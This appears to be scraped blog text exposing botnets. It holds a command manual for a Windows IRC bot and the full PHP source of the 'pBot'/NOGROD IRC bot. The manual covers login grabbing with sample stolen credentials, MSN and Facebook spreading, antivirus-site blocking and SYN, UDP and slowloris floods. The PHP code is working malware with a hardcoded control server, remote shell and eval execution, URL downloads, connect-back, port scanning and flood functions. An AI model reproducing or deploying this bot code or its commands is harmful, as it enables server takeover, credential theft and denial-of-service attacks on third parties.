http://example.com/test.exe 58050954C432B8786284C4E0C7011A57<br /> [00:00:20] <{RU|W7a}abcdefg> [d="http://example.com/update.exe" s="94208 bytes"] Updated bot file "C:\Users\Administrator\AppData\Roaming\Zyxwvu.exe"<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br /> !die<br /><br /> The bot disconnects from the IRC server and does not reconnect until its system reboots.<br /><br /> Example<br /><br /> [00:00:00] <You> !die<br /> [00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) Quit (Connection reset by server)<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /> <br /> !rm<br /><br /> The bot will remove itself from the system.<br /><br /> Example<br /><br /> [00:00:00] <You> !rm<br /> [00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) Quit (Connection reset by server)<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /> <br /> !m [state]<br /><br /> Enable/disable all output to IRC regarding to commands and features.<br /><br /> Parameters<br /> state Enable (on) or disable (off) muting of all output to IRC<br /><br /> Example<br /><br /> [00:00:00] <You> !m on<br /> [00:00:05] <You> !v<br /> [00:00:10] <You> !m off<br /> [00:00:15] <You> !v<br /> [00:00:16] <{RU|W7a}abcdefg> [v="1.0.3" c="You" h="58050954C432B8786284C4E0C7011A57" p="C:\Users\Administrator\AppData\Roaming\Zyxwvu.exe"]<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /> <br /> !v<br /><br /> The bot displays its version, customer name, the MD5 hash of its file, and its installed filepath.<br /><br /> Example<br /><br /> [00:00:00] <You> !v<br /> [00:00:01] <{RU|W7a}abcdefg> [v="1.0.3" c="You" h="58050954C432B8786284C4E0C7011A57" p="C:\Users\Administrator\AppData\Roaming\Zyxwvu.exe"]<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /> <br /> !vs [url] [state]<br /><br /> The bot creates a browser instance and visits the specified link.<br /><br /> Parameters<br /> url URL to open<br /> state Open in a visible (1) or invisible (0) window<br /><br /> Example<br /><br /> [00:00:00] <You> !vs http://example.com/ 0<br /> [00:00:01] <{RU|W7a}abcdefg> [Visit]: Visited "http://example.com/"<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /> <br /> !rc <-n|-g><br /><br /> The bot disconnects from the IRC server and waits 15 seconds before reconnecting.<br /><br /> Parameters<br /> -n Only reconnect if the bot is currently marked as "new"<br /> -g Only reconnect if the bot did not previously succeed in determining its country using GeoIP<br /><br /> Example<br /><br /> [00:00:00] <You> !rc<br /> [00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) Quit (Connection reset by server)<br /> [00:00:16] * <{RU|W7a}gfedcba> (gfedcba@127.0.0.1) has joined #boss<br /> [00:00:25] <You> !rc -g<br /> [00:00:26] * <{ESP|W7a}abcdefg> (abcdefg@127.0.0.2) Quit (Connection reset by server)<br /> [00:00:41] * <{MX|W7a}gfedcba> (gfedcba@127.0.0.2) has joined #boss<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /> <br /> !j [<[rule] [options]> channel] <key><br /><br /> The bot joins the specified channel. If rules are specified, the bot will only join if the rules apply to it.<br /><br /> Parameters<br /> rule Optional rule for the bot to check for. Supported options are -c (country) and -v (version)<br /> options Options for selected rule<br /> With -c, you can put a single or multiple comma-separated country code(s)<br /> With -v, you can put a single or multiple comma-separated version(s)<br /> channel Channel to join<br /> key Key of channel to join<br /><br /> Example<br /><br /> [00:00:00] <You> !j #test k3y<br /> [00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #test<br /> [00:00:05] <You> !j -c RU #test2 k3y<br /> [00:00:10] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #test2<br /> [00:00:11] <You> !j -c US,GB,AU,CA,RU #test3 k3y<br /> [00:00:15] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #test3<br /> [00:00:15] <You> !j -v 1.0.3 #test4 k3y<br /> [00:00:16] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #test4<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /> <br /> !p [<[rule] [options]> channel]<br /><br /> The bot parts the specified channel.<br /><br /> Parameters<br /> rule Optional rule for the bot to check for. Supported options are -c (country) and -v (version)<br /> options Options for selected rule<br /> With -c, you can put a single or multiple comma-separated country code(s)<br /> With -v, you can put a single or multiple comma-separated version(s)<br /> channel Channel to part<br /><br /> Example<br /><br /> [00:00:00] <You> !p #test<br /> [00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #test<br /> [00:00:05] <You> !p -c RU #test2<br /> [00:00:06] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #test2<br /> [00:00:10] <You> !p -c US,GB,AU,CA,RU #test3<br /> [00:00:11] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #test3<br /> [00:00:15] <You> !p -v 1.0.3 #test4<br /> [00:00:16] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #test4<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br /> !s <rule><br /><br /> The bot joins the channel for its country (e.g. Russian bots (RU) join #RU).<br /><br /> Parameters<br /> rule Optional rule for the bot to sort by instead of country. Supported options are -o (operating system), -n (new/old), -u (admin/user), and -v (version)<br /><br /> Example<br /><br /> [00:00:00] <You> !s<br /> [00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #RU<br /> [00:00:05] <You> !s -o<br /> [00:00:06] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #W7<br /> [00:00:10] <You> !s -u<br /> [00:00:11] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #admin<br /> [00:00:15] <You> !s -v<br /> [00:00:16] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has joined #1.0.3<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /> <br /> !us <rule><br /><br /> The bot parts the channel for its country (e.g. Russian bots (RU) part #RU).<br /><br /> Parameters<br /> rule Optional rule for the bot to unsort by instead of country. Supported options are -o (operating system), -n (new/old), -u (admin/user), and -v (version)<br /><br /> Example<br /><br /> [00:00:00] <You> !us<br /> [00:00:01] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #RU<br /> [00:00:05] <You> !us -o<br /> [00:00:06] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #W7<br /> [00:00:10] <You> !us -u<br /> [00:00:11] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #admin<br /> [00:00:10] <You> !us -v<br /> [00:00:11] * <{RU|W7a}abcdefg> (abcdefg@127.0.0.1) has left #1.0.3<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /> <br /> !mod [module] [state]<br /><br /> Enable/disable modules that use hooks.<br /> Note: disabling bdns will only unblock AV and other preset sites, not sites set using the !mdns command.<br /><br /> Parameters<br /> module Module to change. Supported modules: msn, msnu, pdef, iegrab, ffgrab, ftpgrab, bdns, usbi<br /> state Enable (on) or disable (off) module<br /><br /> Example<br /><br /> [00:00:00] <You> !mod ftpgrab off<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /> <br /> !stats <-l|-s><br /><br /> Retrieves statistics for spreading and/or login grabbing. If no parameters are specified, it will display both.<br /><br /> Parameters<br /> -l Display login grabber stats<br /> -s Display spreading stats<br /><br /> Example<br /><br /> [00:00:00] <You> !stats<br /> [00:00:01] <{RU|W7a}abcdefg> [usb="3" msn="10" http="2" total="15"]<br /> [00:00:02] <{RU|W7a}abcdefg><br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /> <br /> !logins <site|-c><br /><br /> Retrieves all grabbed and cached logins and prints them to channel or PM. Can also be used to clear login cache.<br /><br /> Parameters<br /> site Site to retrieve logins for (case insensitive, see here for the list of sites)<br /> -c Clear login cache<br /><br /> Example<br /><br /> [00:00:00] <You> !logins<br /> [00:00:01] <{RU|W7a}abcdefg> [Logins]: Facebook ->> noob@mail.ru : password123<br /> [00:00:02] <{RU|W7a}abcdefg> [Logins]: YouTube ->> noob@mail.ru : password321<br /> [00:00:05] <You> !logins facebook<br /> [00:00:06] <{RU|W7a}abcdefg> [Logins]: Facebook ->> noob@mail.ru : password123<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /> <br /> !stop<br /><br /> The bot will end all running flood tasks.<br /><br /> Example<br /><br /> [00:00:00] <You> !udp example.com 80 60<br /> [00:00:01] <{RU|W7a}abcdefg> [UDP]: Starting flood on "example.com:80" for 60 second(s)<br /> [00:00:30] <You> !stop<br /> [00:00:31] <{RU|W7a}abcdefg> [UDP]: Finished flood on "example.com:80"<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /> <br /> !ssyn [host] [port] [seconds]<br /><br /> See here.<br /><br /> Parameters<br /> host Host to flood with SYN requests<br /> port Port to flood. If 0, the bot uses a random port<br /> seconds Number of seconds to flood the target<br /><br /> Example<br /><br /> [00:00:00] <You> !ssyn example.com 80 60<br /> [00:00:01] <{RU|W7a}abcdefg> [SYN]: Starting flood on "example.com:80" for 60 second(s)<br /> [00:01:01] <{RU|W7a}abcdefg> [SYN]: Finished flood on "example.com:80"<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /> <br /> !udp [host] [port] [seconds]<br /><br /> See here.<br /><br /> Parameters<br /> host Host to flood with UDP packets<br /> port Port to flood. If 0, the bot uses a random port<br /> seconds Number of seconds to flood the target<br /><br /> Example<br /><br /> [00:00:00] <You> !udp example.com 80 60<br /> [00:00:01] <{RU|W7a}abcdefg> [UDP]: Starting flood on "example.com:80" for 60 second(s)<br /> [00:01:01] <{RU|W7a}abcdefg> [UDP]: Finished flood on "example.com:80"<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /> <br /> !slow [host] [minutes]<br /><br /> See here.<br /><br /> Parameters<br /> host Host to flood using slowloris<br /> minutes Number of minutes to flood the target<br /><br /> Example<br /><br /> [00:00:00] <You> !slow example.com 3<br /> [00:00:01] <{RU|W7a}abcdefg> [Slowloris]: Starting flood on "example.com" for 3 minutes<br /> [00:03:01] <{RU|W7a}abcdefg> [Slowloris]: Finished flood on "example.com"<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /> <br /> !msn.int [interval]<br /><br /> Set the number of MSN messages in a conversation before one is changed with your spreading message. See here for more information.<br /> Note: use '#' for a random interval between 1 and 9.<br /><br /> Parameters<br /> interval Number of MSN messages before spread<br /><br /> Example<br /><br /> [00:00:00] <You> !msn.int 3<br /> [00:00:01] <{RU|W7a}abcdefg> [MSN]: Updated MSN spread interval to "3"<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /> <br /> !msn.set [message]<br /><br /> Set the message that will be used for MSN spreading. See here for more information.<br /> Note: use '#' for a random digit and '*' for a random lowercase letter.<br /><br /> Parameters<br /> message Message to spread via MSN<br /><br /> Example<br /><br /> [00:00:00] <You> !msn.set LOL http://example.com/img###/*****/DSC0001.jpg<br /> [00:00:01] <{RU|W7a}abcdefg> [MSN]: Updated MSN spread message to "LOL http://example.com/img583/jgody/DSC0001.jpg"<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br />!http.int [interval]<br /><br /> Set the number of Facebook messages in a conversation before one is changed with your spreading message. See here for more information.<br /> Note: use '#' for a random interval between 1 and 9.<br /><br /> Parameters<br /> interval Number of Facebook messages before spread<br /><br /> Example<br /><br /> [00:00:00] <You> !http.int 3<br /> [00:00:01] <{RU|W7a}abcdefg> [MSN]: Updated HTTP spread interval to "3"<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br /> !http.set [message]<br /><br /> Set the message that will be used for Facebook spreading. See here for more information.<br /> Note: use '#' for a random digit and '*' for a random lowercase letter.<br /><br /> Parameters<br /> message Message to spread via Facebook<br /><br /> Example<br /><br /> [00:00:00] <You> !http.set LOL http://example.com/img###/*****/DSC0001.jpg<br /> [00:00:01] <{RU|W7a}abcdefg> [HTTP]: Updated HTTP spread message to "LOL http://example.com/img583/jgody/DSC0001.jpg"<br /><br />-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br /><br /> !mdns [url|[domain1 <domain2|ip2>]|[ip1 <ip2>]]<br /><br /> The bot will block access to or redirect the specified domain/IP address.<br /> Note: domain to domain, domain to IP address, and IP address to IP address redirects work. IP address to domain redirection does not yet work.<br /> Note: it must be the exact domain, for example "example.com" will not include "www.example.com". Wildcard support will be added in an update.<br /><br /> Parameters<br /> url Plaintext file with one redirect/blocking rule per line, rules are formatted in the same way as the command parameters.<br /> domain1 Requests for this domain will be redirected to domain2 or ip2 if they are set, otherwise it is blocked<br /> ip1 Requests for this IP address will be redirected to ip2 if it is set, otherwise it is blocked<br /> domain2 DNS queries for domain1 will be redirected to this domain if set<br /> ip2 DNS queries for ip1 or domain1 will be redirected to this IP address if set<br /><br /> Example<br /><br /> [00:00:00] <You> !mdns mail.example.com<br /> [00:00:01] <{RU|W7a}abcdefg> [DNS]: Blocked "mail.example.com"<br /><br /> [00:00:05] <You> !mdns http://www.example.com http://www.mysite.com<br /> [00:00:06] <{RU|W7a}abcdefg> [DNS]: Redirected "www.example.com" to "www.mysite.com"<br /> [00:00:10] <You> !mdns 127.0.0.1 127.0.0.2<br /> [00:00:11] <{RU|W7a}abcdefg> [DNS]: Redirected "127.0.0.1" to "127.0.0.2"<br /><br /><br /></code></pre><br />hosting infos:<br />http://whois.domaintools.com/64.186.134.161<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3161329090188179282?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-10734338472027791682012-01-22T18:01:00.000+01:002012-01-22T18:01:36.441+01:0083.170.89.35(linux bots hosted in United Kingdom London Uk2 - Ltd)<pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code><?<br /><br />/*<br /> *<br /> * NOGROD. since 2008<br /> * IRC.UDPLINK.NET<br /> *<br /> * COMMANDS:<br /> *<br /> * .user <password> //login to the bot<br /> * .logout //logout of the bot<br /> * .die //kill the bot<br /> * .restart //restart the bot<br /> * .mail <to> <from> <subject> <msg> //send an email<br /> * .dns <IP|HOST> //dns lookup<br /> * .download <URL> <filename> //download a file<br /> * .exec <cmd> // uses exec() //execute a command<br /> * .sexec <cmd> // uses shell_exec() //execute a command<br /> * .cmd <cmd> // uses popen() //execute a command<br /> * .info //get system information<br /> * .php <php code> // uses eval() //execute php code<br /> * .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack<br /> * .udpflood <target> <packets> <packetsize> <delay> //udpflood attack<br /> * .raw <cmd> //raw IRC command<br /> * .rndnick //change nickname<br /> * .pscan <host> <port> //port scan<br /> * .safe // test safe_mode (dvl)<br /> * .inbox <to> // test inbox (dvl)<br /> * .conback <ip> <port> // conect back (dvl)<br /> * .uname // return shell's uname using a php function (dvl)<br /> *<br /> */<br /><br />set_time_limit(0);<br />error_reporting(0);<br />echo "BlackPower!";<br /><br />class pBot<br />{<br /> var $config = array("server"=>"83.170.89.35",<br /> "port"=>"6667",<br /> "pass"=>"",<br /> "prefix"=>"roots",<br /> "maxrand"=>"5",<br /> "chan"=>"#power",<br /> "chan2"=>"#power",<br /> "key"=>"sunset",<br /> "modes"=>"+p",<br /> "password"=>"powercrew",<br /> "trigger"=>".",<br /> "hostauth"=>"*" // * for any hostname ( remember: /setvhost lAgi.seRius.sCan )<br /> );<br /> var $users = array();<br /> function start()<br /> {<br /> if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))<br /> $this->start();<br /> $ident = $this->config['prefix'];<br /> $alph = range("0","100");<br /> for($i=0;$i<$this->config['maxrand'];$i++)<br /> $ident .= $alph[rand(0,100)];<br /> if(strlen($this->config['pass'])>0)<br /> $this->send("PASS ".$this->config['pass']);<br /> $this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");<br /> $this->set_nick();<br /> $this->main();<br /> }<br /> function main()<br /> {<br /> while(!feof($this->conn))<br /> {<br /> $this->buf = trim(fgets($this->conn,512));<br /> $cmd = explode(" ",$this->buf);<br /> if(substr($this->buf,0,6)=="PING :")<br /> {<br /> $this->send("PONG :".substr($this->buf,6));<br /> }<br /> if(isset($cmd[1]) && $cmd[1] =="001")<br /> {<br /> $this->send("MODE ".$this->nick." ".$this->config['modes']);<br /> $this->join($this->config['chan'],$this->config['key']);<br /> if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }<br /> else { $safemode = "off"; }<br /> $uname = php_uname();<br /> $this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");<br /> $this->privmsg($this->config['chan2'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");<br /> }<br /> if(isset($cmd[1]) && $cmd[1]=="433")<br /> {<br /> $this->set_nick();<br /> }<br /> if($this->buf != $old_buf)<br /> {<br /> $mcmd = array();<br /> $msg = substr(strstr($this->buf," :"),2);<br /> $msgcmd = explode(" ",$msg);<br /> $nick = explode("!",$cmd[0]);<br /> $vhost = explode("@",$nick[1]);<br /> $vhost = $vhost[1];<br /> $nick = substr($nick[0],1);<br /> $host = $cmd[0];<br /> if($msgcmd[0]==$this->nick)<br /> {<br /> for($i=0;$i<count($msgcmd);$i++)<br /> $mcmd[$i] = $msgcmd[$i+1];<br /> }<br /> else<br /> {<br /> for($i=0;$i<count($msgcmd);$i++)<br /> $mcmd[$i] = $msgcmd[$i];<br /> }<br /> if(count($cmd)>2)<br /> {<br /> switch($cmd[1])<br /> {<br /> case "QUIT":<br /> if($this->is_logged_in($host))<br /> {<br /> $this->log_out($host);<br /> }<br /> break;<br /> case "PART":<br /> if($this->is_logged_in($host))<br /> {<br /> $this->log_out($host);<br /> }<br /> break;<br /> case "PRIVMSG":<br /> if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))<br /> {<br /> if(substr($mcmd[0],0,1)==".")<br /> {<br /> switch(substr($mcmd[0],1))<br /> {<br /> case "user":<br /> if($mcmd[1]==$this->config['password'])<br /> {<br /> $this->log_in($host);<br /> }<br /> else<br /> {<br /> $this->notice($this->config['chan'],"[\2Auth\2]: Senha errada $nick idiota!!");<br /> }<br /> break;<br /> }<br /> }<br /> }<br /> elseif($this->is_logged_in($host))<br /> {<br /> if(substr($mcmd[0],0,1)==".")<br /> {<br /> switch(substr($mcmd[0],1))<br /> {<br /> case "restart":<br /> $this->send("QUIT :restart commando from $nick");<br /> fclose($this->conn);<br /> $this->start();<br /> break;<br /> case "mail": //mail to from subject message<br /> if(count($mcmd)>4)<br /> {<br /> $header = "From: <".$mcmd[2].">";<br /> if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))<br /> {<br /> $this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");<br /> }<br /> else<br /> {<br /> $this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");<br /> }<br /> }<br /> break;<br /> case "safe":<br /> if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")<br /> {<br /> $safemode = "on";<br /> }<br /> else {<br /> $safemode = "off";<br /> }<br /> $this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");<br /> break;<br /> case "inbox": //teste inbox<br /> if(isset($mcmd[1]))<br /> {<br /> $token = md5(uniqid(rand(), true));<br /> $header = "From: <inbox".$token."@xdevil.org>";<br /> $a = php_uname();<br /> $b = getenv("SERVER_SOFTWARE");<br /> $c = gethostbyname($_SERVER["HTTP_HOST"]);<br /> if(!mail($mcmd[1],"InBox Test","#nogRod. since 2008\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."\n\ngreetz: irc.udplink.net\nNOGROD OWNZ",$header))<br /> {<br /> $this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");<br /> }<br /> else<br /> {<br /> $this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");<br /> }<br /> }<br /> break;<br /> case "conback":<br /> if(count($mcmd)>2)<br /> {<br /> $this->conback($mcmd[1],$mcmd[2]);<br /> }<br /> break;<br /> case "dns":<br /> if(isset($mcmd[1]))<br /> {<br /> $ip = explode(".",$mcmd[1]);<br /> if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))<br /> {<br /> $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));<br /> }<br /> else<br /> {<br /> $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));<br /> }<br /> }<br /> break;<br /> case "info":<br /> case "vunl":<br /> if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }<br /> else { $safemode = "off"; }<br /> $uname = php_uname();<br /> $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");<br /> $this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");<br /> break;<br /> case "bot":<br /> $this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 by; NOGROD.");<br /> break;<br /> case "uname":<br /> if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }<br /> else { $safemode = "off"; }<br /> $uname = php_uname();<br /> $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");<br /> break;<br /> case "rndnick":<br /> $this->set_nick();<br /> break;<br /> case "raw":<br /> $this->send(strstr($msg,$mcmd[1]));<br /> break;<br /> case "eval":<br /> $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));<br /> break;<br /> case "sexec":<br /> $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);<br /> $exec = shell_exec($command);<br /> $ret = explode("\n",$exec);<br /> for($i=0;$i<count($ret);$i++)<br /> if($ret[$i]!=NULL)<br /> $this->privmsg($this->config['chan']," : ".trim($ret[$i]));<br /> break;<br /><br /> case "exec":<br /> $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);<br /> $exec = exec($command);<br /> $ret = explode("\n",$exec);<br /> for($i=0;$i<count($ret);$i++)<br /> if($ret[$i]!=NULL)<br /> $this->privmsg($this->config['chan']," : ".trim($ret[$i]));<br /> break;<br /><br /> case "passthru":<br /> $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);<br /> $exec = passthru($command);<br /> $ret = explode("\n",$exec);<br /> for($i=0;$i<count($ret);$i++)<br /> if($ret[$i]!=NULL)<br /> $this->privmsg($this->config['chan']," : ".trim($ret[$i]));<br /> break;<br /><br /> case "popen":<br /> if(isset($mcmd[1]))<br /> {<br /> $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);<br /> $this->privmsg($this->config['chan'],"[\2popen\2]: $command");<br /> $pipe = popen($command,"r");<br /> while(!feof($pipe))<br /> {<br /> $pbuf = trim(fgets($pipe,512));<br /> if($pbuf != NULL)<br /> $this->privmsg($this->config['chan']," : $pbuf");<br /> }<br /> pclose($pipe);<br /> } <br /><br /> case "system":<br /> $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);<br /> $exec = system($command);<br /> $ret = explode("\n",$exec);<br /> for($i=0;$i<count($ret);$i++)<br /> if($ret[$i]!=NULL)<br /> $this->privmsg($this->config['chan']," : ".trim($ret[$i]));<br /> break;<br /><br /> case "pscan": // .pscan 127.0.0.1 6667<br /> if(count($mcmd) > 2)<br /> {<br /> if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))<br /> $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");<br /> else<br /> $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");<br /> }<br /> break;<br /> case "ud.server": // .ud.server <server> <port> [password]<br /> if(count($mcmd)>2)<br /> {<br /> $this->config['server'] = $mcmd[1];<br /> $this->config['port'] = $mcmd[2];<br /> if(isset($mcmcd[3]))<br /> {<br /> $this->config['pass'] = $mcmd[3];<br /> $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]);<br /> }<br /> else<br /> {<br /> $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]);<br /> }<br /> }<br /> break;<br /> case "download":<br /> if(count($mcmd) > 2)<br /> {<br /> if(!$fp = fopen($mcmd[2],"w"))<br /> {<br /> $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");<br /> }<br /> else<br /> {<br /> if(!$get = file($mcmd[1]))<br /> {<br /> $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");<br /> }<br /> else<br /> {<br /> for($i=0;$i<=count($get);$i++)<br /> {<br /> fwrite($fp,$get[$i]);<br /> }<br /> $this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");<br /> }<br /> fclose($fp);<br /> }<br /> }<br /> else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }<br /> break;<br /> case "die":<br /> $this->send("QUIT :die command from $nick");<br /> fclose($this->conn);<br /> exit;<br /> case "logout":<br /> $this->log_out($host);<br /> $this->privmsg($this->config['chan'],"[\2auth\2]: $nick deslogado!");<br /> break;<br /> case "udpflood":<br /> if(count($mcmd)>3)<br /> {<br /> $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);<br /> }<br /> break;<br /> case "tcpflood":<br /> if(count($mcmd)>5)<br /> {<br /> $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);<br /> }<br /> break;<br /> }<br /> }<br /> }<br /> break;<br /> }<br /> }<br /> }<br /> $old_buf = $this->buf;<br /> }<br /> $this->start();<br /> }<br /> function send($msg)<br /> {<br /> fwrite($this->conn,"$msg\r\n");<br /><br /> }<br /> function join($chan,$key=NULL)<br /> {<br /> $this->send("JOIN $chan $key");<br /> }<br /> function privmsg($to,$msg)<br /> {<br /> $this->send("PRIVMSG $to :$msg");<br /> }<br /> function notice($to,$msg)<br /> {<br /> $this->send("NOTICE $to :$msg");<br /> }<br /> function is_logged_in($host)<br /> {<br /> if(isset($this->users[$host]))<br /> return 1;<br /> else<br /> return 0;<br /> }<br /> function log_in($host)<br /> {<br /> $this->users[$host] = true;<br /> }<br /> function log_out($host)<br /> {<br /> unset($this->users[$host]);<br /> }<br /> function set_nick()<br /> {<br /> if(isset($_SERVER['SERVER_SOFTWARE']))<br /> {<br /> if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))<br /> $this->nick = "[A]";<br /> elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))<br /> $this->nick = "[I]";<br /> elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))<br /> $this->nick = "[X]";<br /> else<br /> $this->nick = "[U]";<br /> }<br /> else<br /> {<br /> $this->nick = "[C]";<br /> }<br /> $this->nick .= $this->config['prefix'];<br /> for($i=0;$i<$this->config['maxrand'];$i++)<br /> $this->nick .= mt_rand(0,9);<br /> $this->send("NICK ".$this->nick);<br /> }<br /> function udpflood($host,$packetsize,$time) {<br /> $this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]");<br /> $packet = "";<br /> for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }<br /> $timei = time();<br /> $i = 0;<br /> while(time()-$timei < $time) {<br /> $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);<br /> fwrite($fp,$packet);<br /> fclose($fp);<br /> $i++;<br /> }<br /> $env = $i * $packetsize;<br /> $env = $env / 1048576;<br /> $vel = $env / $time;<br /> $vel = round($vel);<br /> $env = round($env);<br /> $this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s ");<br />}<br /><br /> function tcpflood($host,$packets,$packetsize,$port,$delay)<br /> {<br /> $this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");<br /> $packet = "";<br /> for($i=0;$i<$packetsize;$i++)<br /> $packet .= chr(mt_rand(1,256));<br /> for($i=0;$i<$packets;$i++)<br /> {<br /> if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))<br /> {<br /> $this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");<br /> return 0;<br /> }<br /> else<br /> {<br /> fwrite($fp,$packet);<br /> fclose($fp);<br /> }<br /> sleep($delay);<br /> }<br /> $this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");<br /> 